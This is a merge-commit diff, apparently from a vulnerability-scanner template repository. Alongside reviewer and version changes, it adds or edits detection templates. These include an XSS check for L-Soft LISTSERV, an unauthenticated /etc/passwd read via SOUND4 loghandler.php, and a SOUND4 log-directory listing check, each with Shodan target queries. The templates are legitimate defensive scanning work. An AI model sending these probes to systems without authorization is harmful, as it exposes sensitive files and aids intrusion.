Merge branch 'main' into uvicorn-detect
commit
e12559a70d
|
@ -9,7 +9,6 @@ reviewers:
|
|||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
- princechaddha
|
||||
|
||||
# A number of reviewers added to the pull request
|
||||
# Set 0 to add all the reviewers (default: 0)
|
||||
|
@ -17,9 +16,9 @@ numberOfReviewers: 1
|
|||
|
||||
# A list of assignees, overrides reviewers if set
|
||||
assignees:
|
||||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
- ritikchaddha
|
||||
|
||||
# A number of assignees to add to the pull request
|
||||
# Set to 0 to add all of the assignees.
|
||||
|
|
|
@ -1 +1,3 @@
|
|||
cves/2022/CVE-2022-1168.yaml
|
||||
vulnerabilities/other/sound4-file-disclosure.yaml
|
||||
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"
|
||||
|
|
|
@ -2,9 +2,10 @@ id: CVE-2019-15501
|
|||
|
||||
info:
|
||||
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
||||
author: LogicalHunter
|
||||
author: LogicalHunter,arafatansari
|
||||
severity: medium
|
||||
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
description: |
|
||||
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47302
|
||||
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
||||
|
@ -14,6 +15,9 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-15501
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.html:"LISTSERV"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,xss,listserv,edb
|
||||
|
||||
requests:
|
||||
|
@ -24,9 +28,12 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
- 'LISTSERV'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -1 +1 @@
|
|||
5.3.6
|
||||
5.3.8
|
|
@ -1 +1 @@
|
|||
4.5.4
|
||||
4.5.5
|
|
@ -3681,3 +3681,8 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "uvicorn"
|
||||
|
||||
name: tornado
|
||||
part: header
|
||||
words:
|
||||
- "TornadoServer/"
|
|
@ -0,0 +1,30 @@
|
|||
id: sound4-file-disclosure
|
||||
|
||||
info:
|
||||
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
|
||||
metadata:
|
||||
shodan-query: http.html:"SOUND4"
|
||||
verified: "true"
|
||||
tags: packetstorm,lfi,sound4,unauth,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: sound4-directory-listing
|
||||
|
||||
info:
|
||||
name: SOUND4 Impact/Pulse/First/Eco <=2.x - Information Disclosure
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"SOUND4"
|
||||
tags: misconfig,listing,sound4,disclosure,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/log/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Index of /log</title>"
|
||||
- "Parent Directory"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue